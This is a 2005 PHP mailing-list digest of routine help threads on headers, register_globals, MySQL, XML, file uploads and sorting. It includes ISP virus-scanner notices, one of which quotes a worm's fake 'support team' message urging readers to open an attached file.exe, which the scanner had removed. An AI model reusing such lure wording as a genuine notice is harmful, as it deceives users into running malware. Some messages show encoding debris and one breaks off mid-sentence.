php-general Digest 27 May 2005 14:06:46 -0000 Issue 3478
php-general Digest 27 May 2005 14:06:46 - Issue 3478 Topics (messages 215845 through 215855): passthru in IE: fullscreen display of SWF 215845 by: dc Report 215846 by: MAILER-DAEMON php uncongruence (or config?) 215847 by: Miguel Vaz 215853 by: Jochem Maas delivery failed 215848 by: Mail Administrator novice: how to run .sql script from php? 215849 by: tony yau Re: further detail on mysql connect problem 215850 by: Nalini Pal Include Remote Content as REMOTE_ADDR of Browser 215851 by: Gary C. New Stopping users to see uploaded files 215852 by: symbulos Returned mail: Data format error 215854 by: Mail Administrator xml 215855 by: Andy Pieters Administrivia: To subscribe to the digest, e-mail: [EMAIL PROTECTED] To unsubscribe from the digest, e-mail: [EMAIL PROTECTED] To post to the list, e-mail: php-general@lists.php.net -- ---BeginMessage--- hi list- (B (BI am trying to display a SWF file fullscreen, but having problems with IE. (B (BThis is a SWF file that is sitting on the disc, and i want to do a simple (Bpassthru; works fine in opera, firefox, but not IE. Found some notes on (Bthis issue, realted to downloads, but not to full-screen display. (B (BAlso, do not see the same problems when doing dev from .net; so it is a (BPHP IE thing. (B (BI found a "content-disposition: inline" tip, but did not work. (B (BCode snip below (B (B (Bfunction pass4($name) { (B (B // specify the REAL path for your file and not the URL (B $path = getcwd()."./".$name; (B (B // "inline" to view file in browser (B // or "attachment" to download to hard disk (B $disposition = "inline"; (B (B $mime = "application/x-shockwave-flash"; (B (B if (! $fd = fopen ($path, "rb")) { (B die ("couldnt open $path"); (B } else { (B $fsize=filesize($path); (B // $fname= basename ($path); (B (B header("Cache-Control: no-cache, must-revalidate"); (B header("Pragma: no-cache"); (B header("Content-Type: $mime"); (B header("Content-Disposition:$disposition; (Bfilename=\"".trim(htmlentities($name))."\""); (B header("Content-Description: ".trim(htmlentities($name))); (B header("Content-Length: ".(string)(filesize($path))); (B header("Connection: close"); (B (B fpassthru($fd); (B } (B} (B (B (B-- (B___ (BDavid "DC" Collier (Bmobile business creator $B!C%b%P%$%k!&%S%8%M%9!&%/%j%(!<%?!<(B ---End Message--- ---BeginMessage--- ALERT! This e-mail, in its original form, contained one or more attached files that were infected with a virus, worm, or other type of security threat. This e-mail was sent from a Road Runner IP address. As part of our continuing initiative to stop the spread of malicious viruses, Road Runner scans all outbound e-mail attachments. If a virus, worm, or other security threat is found, Road Runner cleans or deletes the infected attachments as necessary, but continues to send the original message content to the recipient. Further information on this initiative can be found at http://help.rr.com/faqs/e_mgsp.html. Please be advised that Road Runner does not contact the original sender of the e-mail as part of the scanning process. Road Runner recommends that if the sender is known to you, you contact them directly and advise them of their issue. If you do not know the sender, we advise you to forward this message in its entirety (including full headers) to the Road Runner Abuse Department, at [EMAIL PROTECTED] Dear user of lists.php.net, Your account was used to send a huge amount of spam messages during this week. Probably, your computer had been infected by a recent virus and now runs a trojaned proxy server. Please follow instruction in the attachment in order to keep your computer safe. Have a nice day, lists.php.net support team. file attachment: file.exe This e-mail in its original form contained one or more attached files that were infected with the [EMAIL PROTECTED] virus or worm. They have been removed. For more information on Road Runner's virus filtering initiative, visit our Help Member Services pages at http://help.rr.com, or the virus filtering information page directly at http://help.rr.com/faqs/e_mgsp.html. ---End Message--- ---BeginMessage--- Hi, I am confused as to how to solve this simple problem. Although it seems as some little config issue i am missing. I have a file index.php with some html tables and this php code: ..html stuff here... ? print $mod; ? ..some more html here... If i feed the script with index.php?mod=2, etc. and run
[PHP] delivery failed
ALERT! This e-mail, in its original form, contained one or more attached files that were infected with a virus, worm, or other type of security threat. This e-mail was sent from a Road Runner IP address. As part of our continuing initiative to stop the spread of malicious viruses, Road Runner scans all outbound e-mail attachments. If a virus, worm, or other security threat is found, Road Runner cleans or deletes the infected attachments as necessary, but continues to send the original message content to the recipient. Further information on this initiative can be found at http://help.rr.com/faqs/e_mgsp.html. Please be advised that Road Runner does not contact the original sender of the e-mail as part of the scanning process. Road Runner recommends that if the sender is known to you, you contact them directly and advise them of their issue. If you do not know the sender, we advise you to forward this message in its entirety (including full headers) to the Road Runner Abuse Department, at [EMAIL PROTECTED] The original message was included as attachment file attachment: message.exe This e-mail in its original form contained one or more attached files that were infected with the [EMAIL PROTECTED] virus or worm. They have been removed. For more information on Road Runner's virus filtering initiative, visit our Help Member Services pages at http://help.rr.com, or the virus filtering information page directly at http://help.rr.com/faqs/e_mgsp.html. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] further detail on mysql connect problem
Hi Jim, MySQL have changed the password hashing in version 4.1 Go to your mysql command prompt. If you are using windows you can find it from Start MySQL MySQL Server 4.1 MySQL Command Line Client. Or something like that... Type the following, replacing your values for some user, some host and my pass: mysql SET PASSWORD FOR 'some_user'@'some_host' = OLD_PASSWORD('mypass'); Here is the mysql doc for it: http://dev.mysql.com/doc/mysql/en/password-hashing.html I spent ages trying to work this one out, hope this helps.. Have you downloaded mysql administrator? Best wishes nalini [EMAIL PROTECTED] -Original Message- From: Jim Sara Feldman [mailto:[EMAIL PROTECTED] Sent: 27 May 2005 04:41 To: Nalini Pal Subject: RE: [PHP] further detail on mysql connect problem Nalini: Thanks. I installed PHP5 and got by the mysql_pconnect() issue. That got me to the effort to compare a login with stored data. No match. I am wondering if MySQL has changed the password translation algorithm. I suspect that once I have unraveled that mystery, all that worked before will work again. Again, many thanks. Jim Hi Jim I had the same problem a couple of weeks ago. After much searching I found this solution that worked for me: http://forums.mysql.com/read.php?11,6400,10611#msg-10611 Hope that helps Nalini -Original Message- From: Jim Sara Feldman [mailto:[EMAIL PROTECTED] Sent: 25 May 2005 01:16 To: php general discussion list Subject: [PHP] further detail on mysql connect problem Hi: Adding a detail to my previous note on the mysql connect problem: At the point where I attempted to connect, I added a printout of the error generated when the instruction ran. The two lines now read: $result = mysql_pconnect(localhost, api_user, x97533); echo Tried to connect. Problem: .mysql_error(). br; What came back was: Tried to connect. Problem: Client does not support authentication protocol requested by server; consider upgrading MySQL client Thanks for your help. Jim -- Jim Feldman 14 Linda Lane Newton, MA 02461 617-527-0509 -- Jim Feldman 14 Linda Lane Newton, MA 02461 617-527-0509 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Include Remote Content as REMOTE_ADDR of Browser
Is there a quick and dirty way to include, file, or fsockopen content from a remote server and make it appear as though the request was straight from the browser's remote address? Thank you for your assistance. Respectfully, Gary -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] novice: how to run .sql script from php?
Hi All, I got this .sql script that setup the whole db schema, I can run mysql.exe to run on my pc but when it goes to a hosting company's server I don't have that command! So I tried to include(setup.sql) into a string and send that as one long sql query. BUT I need to get rid of all the comment lines first in the script!! can someone give me a better idea of doing this. (there must be an equivalent php function like mysql_run_script(setup.sql)) thanks -- Tony Yau -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Stopping users to see uploaded files
Dear friends, we are using php for developing a small tool for uploading files for download (publications). Using the usual move_uploaded_file, the publications are loaded into a directory where the webserver can write / read. Unfortunately, that means every person who connects to the directory can see the files. If some of the files are for sale, how do you stop the user from seeing them / downloading them without permission? Is there any other way to upload files using php? Thanks in advance! -- symbulos - ethical services for your organisation website www.symbulos.com -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] php uncongruence (or config?)
Miguel Vaz wrote: Hi, I am confused as to how to solve this simple problem. Although it seems as some little config issue i am missing. its the fact that your hosting provider is using an older php version than you are at home (I'm guessing here, but it seems the most obvious reason) ... and that the default (php.ini)setting for 'register_globals' has changed from 'On' to 'Off'. googling for 'PHP + register_globals' should get you upto speed on whats going on. (hint: relying on register_globals being On, as you are going, is not recommended) also findout about using the function phpinfo() to determine what version of php you are running at any given site/machine (phpinfo() also provides _lots_ of other useful/interesting info) I have a file index.php with some html tables and this php code: ..html stuff here... ? print $mod; ? ..some more html here... If i feed the script with index.php?mod=2, etc. and run it locally, i get an error saying: Notice: Undefined variable: mod in c:\win2kapp\easyphp1-8\www\index.php on line 36 If i run it on a web server, it works perfectly. Whats the difference or where might be the problem in the php.ini? (if its there) The server i am using is easyphp, that package that install apache, php and mysql all together. I am running a windows xp box. Thanks in advance. Pag -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Returned mail: Data format error
ALERT! This e-mail, in its original form, contained one or more attached files that were infected with a virus, worm, or other type of security threat. This e-mail was sent from a Road Runner IP address. As part of our continuing initiative to stop the spread of malicious viruses, Road Runner scans all outbound e-mail attachments. If a virus, worm, or other security threat is found, Road Runner cleans or deletes the infected attachments as necessary, but continues to send the original message content to the recipient. Further information on this initiative can be found at http://help.rr.com/faqs/e_mgsp.html. Please be advised that Road Runner does not contact the original sender of the e-mail as part of the scanning process. Road Runner recommends that if the sender is known to you, you contact them directly and advise them of their issue. If you do not know the sender, we advise you to forward this message in its entirety (including full headers) to the Road Runner Abuse Department, at [EMAIL PROTECTED] The original message was received at Fri, 27 May 2005 07:48:55 -0400 from 56.20.100.19 - The following addresses had permanent fatal errors - php-general@lists.php.net file attachment: attachment.zip This e-mail in its original form contained one or more attached files that were infected with the [EMAIL PROTECTED] virus or worm. They have been removed. For more information on Road Runner's virus filtering initiative, visit our Help Member Services pages at http://help.rr.com, or the virus filtering information page directly at http://help.rr.com/faqs/e_mgsp.html. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] xml
Hi all I recently decided to switch to xml for the configuration of our programs. I am now looking for a good way to handle that xml data. Basically, what I am looking for is a functionality where I say Get tag x with attribute1=y, attribute2=z,..., read its contents and put it in an associative array. It should put it in an array like this: output[0]['tagname']=... output[0]['arg1']=... output[0]['arg2']=... etc Example xml someheader name=x content attrib1=y attrib2=z / content attrib1=x / /someheader /xml getxmldata(someheader,name,x) would result in data[0]['type']=content data[0]['attrib1']=y data[0]['attrib2']=z data[1]['type']=content data[1]['attrib1']=x Anybody got any ideas? With kind regards Andy -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Stopping users to see uploaded files
verffentlicht per Mail versendet symbulos wrote: Dear friends, we are using php for developing a small tool for uploading files for download (publications). Using the usual move_uploaded_file, the publications are loaded into a directory where the webserver can write / read. Unfortunately, that means every person who connects to the directory can see the files. If some of the files are for sale, how do you stop the user from seeing them / downloading them without permission? Is there any other way to upload files using php? Thanks in advance! Probably you want to upload the files in a directory outsite the document root, but read permission by the webserver user. Then you can you use e.g. PEAR::HTTP_Download for sending the files to the client. Hope this helps, and sorry for my bad english. :) cheers Jens -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] novice: how to run .sql script from php?
tony yau wrote: Hi All, I got this .sql script that setup the whole db schema, I can run mysql.exe to run on my pc but when it goes to a hosting company's server I don't have that command! So I tried to include(setup.sql) into a string and send that as one long sql query. BUT I need to get rid of all the comment lines first in the script!! can someone give me a better idea of doing this. (there must be an equivalent php function like mysql_run_script(setup.sql)) Either do it with a query mysql_query ( LOAD DATA INFILE 'file.sql' ); Or use a system command in php... $command = mysql db_name file.sql; exec ( $command ); -- John C. Nichel ÜberGeek KegWorks.com 716.856.9675 [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] novice: how to run .sql script from php?
I'm assuming that the .sql file consists of a list of MySQL queries, that when performed sequentially will set up your system. That being the case, the perfered way ot install the thing is to do a 'mysql [host/username/password parameters] file.sql'. I believe you can also run file.sql scripts using phpMyAdmin. If you were to define a mysql_run_script() function, it would look a bit like the following: ?pseudo_code function mysql_run_script($file){ $sql = file_get_contents($file); $queries = split_sql_into_individual_sql_queries($sql); foreach($queries as $query){ mysql_query($query); } } ? Come to think of it, you could turn the above pseudo code into valid php code, by defining the split_sql_into_individual_sql_queries() function. This would involve splitting by ';', taking into account the possibility that ';' may occur in the middle of a string. Check out the code for phpmyadmin, or phpbb(db backup/recover feature), for a better idea. On 5/27/05, tony yau [EMAIL PROTECTED] wrote: Hi All, I got this .sql script that setup the whole db schema, I can run mysql.exe to run on my pc but when it goes to a hosting company's server I don't have that command! So I tried to include(setup.sql) into a string and send that as one long sql query. BUT I need to get rid of all the comment lines first in the script!! can someone give me a better idea of doing this. (there must be an equivalent php function like mysql_run_script(setup.sql)) thanks -- Tony Yau -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] xml
Hi all I recently decided to switch to xml for the configuration of our programs. I am now looking for a good way to handle that xml data. Basically, what I am looking for is a functionality where I say Get tag x with attribute1=y, attribute2=z,..., read its contents and put it in an associative array. It should put it in an array like this: [snip] Anybody got any ideas? Never done it, but I'd start here: http://us3.php.net/manual/en/ref.simplexml.php http://us3.php.net/manual/en/ref.xml.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] include file and problems with headers
Make sure you don't have any blankspace before or after the ?php ... ? in your stats.php file. That's usually what does it. On Sat, 21 May 2005, Ross wrote: I have the folowing code which checks whether the user has logged in. if (!isset ($_SESSION['new_session'] ) ) { $login_status = div class=\standard_text\Your are not signed in /div; } if (isset ($_SESSION['new_session'] ) ) { $address = $_SESSION['new_session']; $login_status = div class=\standard_text\Your are signed in as span class=\under\$address/span/div; } ? Now when I have this as a file to be included in each page, status.php (see code) gives the header error (already sent). ?php session_start(); include('status.php'); When the code is pasted in each individual page it works fine. This is no big deal but it is annoying me! why does this not work. I have also tried require_once include_once() but nothin works. Later on in the page there is a form which sets some cookies and uses php_self() to send the data to itself. Ross -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Free penetration test
Hello, on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if someone gets in, create a page with the cms as proof. You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] addslashes/stripslashes issue
Hi all, Ok here is what I need help with: $var = i like fi'sh; I'm able to addslashes(gather the data from a form), submit into the database, stripslashes(retrieve it). My problem is when I display it in a input type=text form the single quote is causing a truncation. input type=text value={$var} will display as: i like fi in the text form... Any help? -- John -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] financial application form
[snip] There could be several ways to do this. One would be to set a variable to the value 'joint_' (or some other value) and append that to the variables of the second form once the first form is complete $2nd_form_var_prefix = 'joint_'; if(complete == $all_first_form_vars){ $2nd_form_vars = $2nd_form_prefix . $1st_form_var_name; } [/snip] Hi jay, Many thanks for the advice and sorry its taken so long to respond. I can see your solution working but I am not sure how I can append $2nd_form_var_prefix to the existing vars without manually adding this to each one. I guess id have to get everything into an array? My boss/client wishes to have both forms displayed simultaneously, PITA! So that considered, maybe ill just have to have 2 separate forms. Thanks again for your help Dave Sayer | Digital Meme Freelance web design/development Tel: 01225 311547 Mob: 07795388109 Email: [EMAIL PROTECTED] Web: http://www.digitalmeme.com -Original Message- From: Jay Blanchard [mailto:[EMAIL PROTECTED] Sent: 23 May 2005 13:49 To: [EMAIL PROTECTED]; php-general@lists.php.net Subject: RE: [PHP] financial application form [snip] I have a large application form (financial) which I have working fine but I need to be able to have it either work as a single application or a joint one. If joint it needs to display two forms for the user to fill in. I am just wondering how I can do this without having to write a second form as there are 8 pages (around a hundred fields) to this form and I don't fancy modifying all of the vars and fields to do this. If anyone knows how or can point me in the right direction, id be most thankful. [/snip] There could be several ways to do this. One would be to set a variable to the value 'joint_' (or some other value) and append that to the variables of the second form once the first form is complete $2nd_form_var_prefix = 'joint_'; if(complete == $all_first_form_vars){ $2nd_form_vars = $2nd_form_prefix . $1st_form_var_name; } Something like that. -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 266.11.15 - Release Date: 22/05/2005 -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 266.11.16 - Release Date: 24/05/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] php not allowed in .htaccess
Hi, dumb config issue. I'm putting a php_value include_path statement in an .htaccess file php_value include_path .:/home/user/public_html/dis/admin/:/home/nick/ php_value auto_prepend_file /home/user/public_html/dis/admin/wcsconf.php and getting a 500 Server Error. Apache logs say, .htaccess: php_value not allowed here Where can I change this behavior - is this an apache httpd.conf or php.ini setting? Something else? Thanks in advance! -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Building multi-page Word docs with PHP?
If it were that important, then you could probably figure out a way to get OOo, to do it through Uno. On 5/25/05, Brent Baisley [EMAIL PROTECTED] wrote: I've only read about being able to generate a Word document if you are running under Windows (which I am not). I gave up long ago trying to figure out the rtf spec to auto generate Word documents. I do exactly what you do, except I generate HTML instead and attach a .doc to the file. The Word document actually ends up being larger than the HTML document, but I don't do all that much formatting. What you are looking for is something like the opposite of AntiWord, unless AntiWord has a reverse option. On May 25, 2005, at 8:50 AM, George Pitcher wrote: Hi, I currently create my multipage docs by saving my word templates as chunks of rtf and then calling them as required as a very long string then outputting them to an rtf file and renaming it as '*.doc'. It works great except for the filesize which comes out at 900k for a two-page document. Opening in Word and saving reduces the file down dramatically, but that would prevent auto-generation and emailing - without human intervention. Does anyone know how to either create multipage docs in Word format to begin with, or to convert (on the fly) rtf to doc, or to save rtf as smaller file? MTIA George -- Brent Baisley Systems Architect Landover Associates, Inc. Search Advisory Services for Advanced Technology Environments p: 212.759.6400/800.759.0577 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] per user per blog
Hi, Am looking for opensource blogging engine that does per user per blog with PHP and mySQL and authenticates user thru LDAP. Best rgds, Roger --- Sign Up for free Email at http://ureg.home.net.my/ --- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Voting Polls and preventing multiple votes
Hi there I am mocking up a quick voting poll system, however I would like to put hooks in place to prevent users posting more than once, voting bots etc. Is there a way to prevent them, obviously sessions, cookies, host ips cant be used as they can be removed, and especially with host ips , ppl are usually behind a proxy ip that doesnt forwarding the referring ip. Let me know if anyone has cooked up something like this thanks. I have the voting mechanism and result displaying fine, just the special checks to prevent the form being displayed. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Building multi-page Word docs with PHP?
Before we get ahead of ourselves, can we ask what OS you're using George? If you're using Windows, then you have COM. If you're not insane, then you'll have to use unix tools. For turning documents TO word docs, then the only way I can think of is to script OOo in some way. I'm assuming that you're already gzipping your rtf files? On 5/26/05, Jochem Maas [EMAIL PROTECTED] wrote: George Pitcher wrote: Hi, I currently create my multipage docs by saving my word templates as chunks of rtf and then calling them as required as a very long string then outputting them to an rtf file and renaming it as '*.doc'. It works great except for the filesize which comes out at 900k for a two-page document.. Opening in Word and saving reduces the file down dramatically, but that would prevent auto-generation and emailing - without human intervention.. Does anyone know how to either create multipage docs in Word format to begin with, or to convert (on the fly) rtf to doc, or to save rtf as smaller file? I googled a bit a stumbled across this: http://www.xmlw.ie/aboutxml/wordml.htm requires word2003 tho. MTIA George -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] CGI's on Apache
Hi all. I know this isn't php related, but I'm not subscribed to an apache mailing list, and this is probably the closest of all the mailing lists I'm subscribed to, to the topic. I tried to enable CGI in my $HOME/public_html directory, by adding the ExecCGI option, to the Directory /home/*/public_html section of the httpd.conf file. Any CGI's I ran resulted in an Internal Server Error on screen, and a Premature end of script headers in the error log. When I change to using a ScriptAlias the CGI's work fine, but I need to have other non-cgi's in the same directory, and using ScriptAlias, means that everything is considered a CGI, including Images, and CSS, which as a result don't work. That fact that ScriptAlias works suggests that my scripts are okay - but why don't they work with ExecCGI? I'm using Fedora Core 3, with Apache/2.0.52 (Fedora) Server at localhost Port 80, and otherwise default settings. Regards Rory -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Recursion: Ugh!
Chris W. Parker wrote: Marek Kilimajer mailto:[EMAIL PROTECTED] on Thursday, May 26, 2005 11:35 AM said: untested: function display($array, $prefix = '') { echo $prefix ':' . $array['name'] . \n; if(is_array($array['children']) $array['children']) { foreach($array['children'] as $child) { display($child, $prefix ':' . $array['name']); } } } Thanks Marek. I've had one suggestion off list also ... If that is the email from me, it's not intended to be offlist. The list doesn't seem to be relay my email. Thanks, Chris. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Recursion: Ugh!
Chris W. Parker wrote: Hi everyone, I've been working on a problem for a few days now and I'm not making any headway so I think it's time I come to the list for some help (though this really disappoints me since it appears I'm not capable of solving this problem on my own!). Anyway, I'm using the Modified Preorder Tree Traversal method to store my category hierarchy. Using recursion I can build an array that accurately depicts the layout of the categories. So far so good. What I have not been able to do thus far is turn that array into a list that looks like this: Food:Fruit:Red Food:Fruit:Green Food:Fruit:Yellow Food:Vegetables:Long Food:Vegetables:Round Food:Vegetables:Round:Spikey Food:Vegetables:Round:Smooth My array is included at the end of this email. (And yes I typed it by hand so hopefully there aren't any errors in it.) I've searched the web but haven't found anything that's helped. Anyone have a solution? Thanks, Chris. ... I'm assuming this *is* a in a DB with Left and Right values. There are two ways I do this, the first is just a relatively simple query: SELECT sName FROM table WHERE 5 != iID AND (SELECT iLeft FROM table WHERE 5 = iID) BETWEEN iLeft AND iRight ORDER BY iLeft; That will get You the parents of the Node with ID 5, starting witht he Root node. It pulls out all the Nodes whose Left and Right values contain the target node. I also do this otuside of the query sometimes like this: $oBy is an Object that implements Iterator and returns MySQL database rows as objects. It maintains the Path parts as a stack $aStack = array(); $aPath = array(); $iDepth = 0; foreach($oBy as $oRow) { while($iDepth 0) { if($aStack[$iDepth-1] $oRow-iR) unset($aStack[--$iDepth],$aPath[$iDepth]); else break; } $aPath[$iDepth] = $oRow-sCategoryID; echo implode(':',$aPath); $aStack[$iDepth++] = $oRow-iR; } I've been doing a lot of working with these things the last few weeks, alot of this stuff is still fresh in mind, but I'm a horrible communicator. If this didn't answer your question, or if you ihave more ask away, I'll do my best. Chris -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Stopping users to see uploaded files
-Original Message- From: symbulos [mailto:[EMAIL PROTECTED] Sent: Friday, May 27, 2005 1:00 PM Unfortunately, that means every person who connects to the directory can see the files. If some of the files are for sale, how do you stop the user from seeing them / downloading them without permission? Move them _outside_ webscope and generate a download with the header() function, which is only is executed if the user has access. Is there any other way to upload files using php? That way´s just fine. You could upload directly to the dir outside webscope if You like? -- Med venlig hilsen / best regards ComX Networks A/S Kim Madsen Systemudvikler/Systemdeveloper -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: printf() in a variable, or alternative to printf()
sprintf() http://php.net/manual/en/function.sprintf.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Recursion: Ugh!
Chris W. Parker wrote: Hi everyone, I've been working on a problem for a few days now and I'm not making any headway so I think it's time I come to the list for some help (though this really disappoints me since it appears I'm not capable of solving this problem on my own!). Anyway, I'm using the Modified Preorder Tree Traversal method to store my category hierarchy. Using recursion I can build an array that accurately depicts the layout of the categories. So far so good. What I have not been able to do thus far is turn that array into a list that looks like this: Food:Fruit:Red Food:Fruit:Green Food:Fruit:Yellow Food:Vegetables:Long Food:Vegetables:Round Food:Vegetables:Round:Spikey Food:Vegetables:Round:Smooth My array is included at the end of this email. (And yes I typed it by hand so hopefully there aren't any errors in it.) I've searched the web but haven't found anything that's helped. Anyone have a solution? Thanks, Chris. ... I'm assuming this *is* a in a DB with Left and Right values. There are two ways I do this, the first is just a relatively simple query: SELECT sName FROM table WHERE 5 != iID AND (SELECT iLeft FROM table WHERE 5 = iID) BETWEEN iLeft AND iRight ORDER BY iLeft; That will get You the parents of the Node with ID 5, starting witht he Root node. It pulls out all the Nodes whose Left and Right values contain the target node. I also do this otuside of the query sometimes like this: $oBy is an Object that implements Iterator and returns MySQL database rows as objects. It maintains the Path parts as a stack $aStack = array(); $aPath = array(); $iDepth = 0; foreach($oBy as $oRow) { while($iDepth 0) { if($aStack[$iDepth-1] $oRow-iR) unset($aStack[--$iDepth],$aPath[$iDepth]); else break; } $aPath[$iDepth] = $oRow-sCategoryID; echo implode(':',$aPath); $aStack[$iDepth++] = $oRow-iR; } I've been doing a lot of working with these things the last few weeks, alot of this stuff is still fresh in mind, but I'm a horrible communicator. If this didn't answer your question, or if you ihave more ask away, I'll do my best. Chris -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Sorting Objects in an array by object properties
Hello list, I have an array which holds some objects. Each object represent elements from an email header in a given mailbox. Each object has properties like from, sendtime, subject etc. I want to sort the order of the objects in the array by their attribute sendtime in order to get a list of email header sorted by their arrival time. Has anyone an idea how to solve this? I tried various of the array sorting functions but without success. Thanks in advance Reto PS: The array has the following structure: Array ( [0] = mail_Header Object ( [id] = 1 [pid] = 1 [read] = r [flagged] = n [from] = [EMAIL PROTECTED] [subject] = Re: [ugffm] TYPO3 anybody ? [sendtime] = 2005.05.17 - 18:27:25 ) [1] = mail_Header Object ( [id] = 2 [pid] = 1 [read] = r [flagged] = n [from] = [EMAIL PROTECTED] [subject] = Re: [ugffm] website [sendtime] = 2005.05.17 - 19:13:26 ) ) -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: xml
Andy Pieters wrote: Hi all I recently decided to switch to xml for the configuration of our programs. I am now looking for a good way to handle that xml data. Basically, what I am looking for is a functionality where I say Get tag x with attribute1=y, attribute2=z,..., read its contents and put it in an associative array. If you want that much granular detail then you might want to use XPATH. The syntax is obviously a little different than PCRE, but once you understand it you'll find it's much more efficient (and easier) than building monstrously large PCRE's. http://php.net/manual/en/function.dom-domxpath-query.php http://www.w3.org/TR/xpath#path-abbrev -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: Sorting Objects in an array by object properties
Reto M. Kiefer wrote: ... PS: The array has the following structure: Array ( [0] = mail_Header Object ( [id] = 1 [pid] = 1 [read] = r [flagged] = n [from] = [EMAIL PROTECTED] [subject] = Re: [ugffm] TYPO3 anybody ? [sendtime] = 2005.05.17 - 18:27:25 ) [1] = mail_Header Object ( [id] = 2 [pid] = 1 [read] = r [flagged] = n [from] = [EMAIL PROTECTED] [subject] = Re: [ugffm] website [sendtime] = 2005.05.17 - 19:13:26 ) ) For certain you will want to use usort, maybe something like: ?php usort($your_array, 'sort_by_sendtime'); function sort_by_sendtime($mailObj1, $mailObj2) { if ($mailObj1-sendtime == $mailObj2-sentime) { return 0; } return ($mailObj1-sendtime $mailObj2-sendtime) ? -1 : 1; } ? -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] addslashes/stripslashes issue
JM wrote: Hi all, Ok here is what I need help with: $var = i like fi'sh; I'm able to addslashes(gather the data from a form), submit into the database, stripslashes(retrieve it). My problem is when I display it in a input type=text form the single quote is causing a truncation. input type=text value={$var} will display as: i like fi in the text form... Any help? Which browser is doing that? If you really have double-quotes around the value then single quotes inside shouldn't truncate anything. eg. http://lerdorf.com/test.html Do you see the single quote there? -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] DOM: browse childnodes but not recursively
Ciao! I really hope someone can help me on this, since I have been putting in to much time in it now, and I have to show off some results ;) The problem is that I can't browse nodelists in only one dimension, that is, whitout getting the sub-nodes of the nodes. My XML reads: element id=5 element id=51Still got the blues/element element id=52Gary Moore/element element id=53 element id=9 element id=531Maggie May/element element id=532Rod Stewart/element element id=533UK/element element id=534Pickwick/element element id=5358.50/element element id=5361990/element /element /element element id=54Virgin records/element element id=5510.20/element element id=561990/element /element I get this as a DOMNodeList in the variable $elements. I will write some examples, to describe my problem. echo $elements-length; // outputs 1 var_dump($elements); // outputs object(DOMNodeList)#5 (0) { } var_dump($elements-item(0)); // contents of element with id=5 // outputs object(DOMElement)#4 (0) { } Here I come to the problem. What I want is to get a list of the 6 elements inside element id=5, but not with child-childs. echo $elements-item(0)-childNodes-length; // Outputs 13! So, to put it in short words; how do I do to browse the content of the element id=5 